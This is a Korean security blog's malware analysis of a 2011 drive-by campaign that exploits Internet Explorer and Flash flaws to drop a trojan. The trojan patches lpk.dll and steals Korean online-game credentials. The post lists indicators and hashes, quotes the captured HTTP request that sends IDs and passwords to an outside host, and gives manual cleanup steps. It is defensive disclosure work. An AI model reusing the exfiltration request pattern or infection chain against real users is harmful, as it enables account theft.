본문 바로가기

벌새::Analysis

lpk.dll 시스템 파일을 패치하는 악성코드 자동 감염 주의 (2011.6.12)

728x90
반응형
주말을 이용하여 웹하드 등 국내 유명 사이트들이 제로데이(0-Day) 취약점으로 추정되는 악성코드로 인하여 보안 패치가 완벽하게 이루어진 시스템에서도 자동 감염이 이루어질 수 있는 부분을 발견하였습니다.

 

Windows 7 + Internet Explorer 9 환경에서 악의적으로 변조된 인터넷 사이트에 접속할 경우 사용자 계정 컨트롤(UAC) 기능을 통해 사용자 몰래 다운로드되어 실행되려는 scvhost.exe 파일의 허용 여부를 묻는 창이 생성되는 것을 확인할 수 있습니다.


만약 Window XP + Internet Explorer 8 환경에서는 위와 같은 UAC 보안 기능이 없으므로 해킹된 인터넷 사이트에 접속하는 동작만으로 자동으로 감염되는 것을 확인하였으며, 감염 후 자동으로 웹 브라우저가 종료되는 현상이 발생하는 현상도 있습니다.

만약 해당 창에서 사용자가 [예] 버튼을 클릭할 경우 감염으로 연결이 이루어지며, [아니요]를 클릭할 경우에는 [C:\Users\(사용자 계정)\AppData\Local\Temp\Low\scvhost.exe] 파일을 찾아 수동으로 삭제하시면 됩니다.

참고로 scvhost.exe(MD5 : 92a8a413f2597e737920db00f20768c0) 파일에 대해서는 nProtect 보안 제품에서 Trojan/W32.Agent.83490 (VirusTotal : 17/42) 진단명으로 진단되고 있으며, 알약(ALYac) 2.0 보안 제품에서는 Trojan.Dropper.OnlineGames.mi32 진단명으로 진단됩니다.

[악성코드 유포 경로 및 진단 정보]

h**p://174.1**.224.**/help.html
 ㄴh**p://174.1**.224.**/main.swf
h**p://174.1**.224.**/ad.html
 ㄴ h**p://174.1**.224.**/bin.html :: CVE-2010-0806 취약점
   ㄴ h**p://174.1**.224.**/help.txt(암호화) -> scvhost.exe

main.swf (MD5 : b45163febcc2a91950a636bac5369c11)
 - nProtect : Trojan-Exploit/W32.SWFlash.3824.IZ (VirusTotal : 1/42)

bin.html
 - nProtect : Script-JS/W32.Agent.CEC (VirusTotal : 12/42)

유포되는 사이트에서는 2개의 악성 스크립트 파일을 통해 Internet Explorer 웹 브라우저의 CVE-2010-0806 취약점과 Adobe Flash Player 취약점을 이용하는 것으로 보입니다.

하지만 해당 보안 패치가 이루어진 환경에서도 Windows XP 환경에서는 자동 감염이 이루어지고, Windows 7 환경에서도 정상적으로 파일 다운로드가 된다는 점에서 알려지지 않은 새로운 Adobe Flash Player 취약점이 포함되어 있는 것이 아닌가 추정됩니다.

 

[생성 폴더 / 파일 등록 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
C:\WINDOWS\system32\2011612204611.dll :: 해당 파일은 2011<Random 9~10자리 숫자>.dll 유형, lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk32.dll :: lpk.dll 백업 파일(정상 파일)
C:\WINDOWS\system32\lpk.dll :: lpk.dll 패치 파일(악성 파일), 변경 전 파일 크기 - 22,016 Bytes / 변경 후 파일 크기 - 33,586,058 Bytes
[생성 파일 진단 정보]

C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
 - MD5 : 3C6B2938356F9AB3D406538BD6228FEE
 - Hauri ViRobot : Trojan.Win32.PSWIGames.33598862

C:\WINDOWS\system32\lpk.dll
 - MD5 : 13E9EE212FBFB0263309F87054958A34
 - AhnLab V3 : Trojan/Win32.OnlineGameHack

 

해당 악성코드에 감염된 PC는 정상적인 lpk.dll(Language Pack) 파일을 패치하여 lpk32.dll 파일로 백업을 하고, 악성 lpk.dll 파일은 정상적인 시스템 파일처럼 다양한 프로세스에 추가되어 사용자의 눈을 속이고 있습니다.

 

악성 lpk.dll 파일은 기존의 유사한 감염 방식으로 꾸준하게 발견되고 있으며, 국내 온라인 게임 피망, 넷마블, 메이플스토리, 던전앤파이터 등의 계정 정보를 탈취할 수 있습니다.

GET /ooo/net/mail.asp?a1=1&a3=(넷마블 ID)&a4=(비밀번호) HTTP/1.1
User-Agent: WinInet
Host:
www.iiiigame.com

Cache-Control: no-cache

실제 감염된 환경에서 넷마블 사이트에서 로그인을 시도할 경우 미국(USA)에 위치한 174.128.224.107 서버로 계정 정보를 이메일을 통해 전송하는 동작을 확인할 수 있습니다.

만약 보안 제품으로 문제가 해결되지 않는 분들은 다음과 같은 절차에 따라 수동으로 해결하시기 바랍니다.

먼저 모든 프로그램을 종료한 상태에서 다음의 폴더, 파일을 수동으로 삭제하시기 바랍니다.

 

  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%
  • C:\Program Files\%NXU32YHysu3YDU3IDd46TGh%\6549302827346110393.exe
  • C:\WINDOWS\system32\2011(Random 9~10자리 숫자).dll

다음으로는 lpk.dll 파일의 확장자명을 다음과 같이 변경합니다.

 

  • C:\WINDOWS\system32\lpk.dll → C:\WINDOWS\system32\lpk.dll-

사용자가 악성 lpk.dll 파일의 확장자를 변경하면 윈도우 파일 보호(WFP) 기능으로 자동으로 정상적인 lpk.dll 파일이 복원되므로 참고하시기 바랍니다.

파일 확장자를 변경한 후에는 반드시 시스템 재부팅을 한 후, 다음의 파일을 수동으로 삭제하시기 바랍니다.

 

  • C:\WINDOWS\system32\lpk32.dll
  • C:\WINDOWS\system32\lpk.dll-

위와 같이 문제를 해결한 후에는 반드시 유명 보안 제품을 이용하여 시스템 정밀 검사를 하시기 바라며, 온라인 게임 해킹 예방을 위해 본인이 이용하시는 온라인 게임 계정 비밀번호를 변경하시기 바랍니다.

이번 사례의 경우에는 보안 패치가 잘 이루어진 환경에서도 자동 감염이 예상되므로 매우 주의하시기 바라며, 악성코드를 유포하는 인터넷 사이트는 되도록 이용하지 않도록 하시는 것이 차후에도 유사한 공격을 예방할 수 있는 방법입니다.

728x90
반응형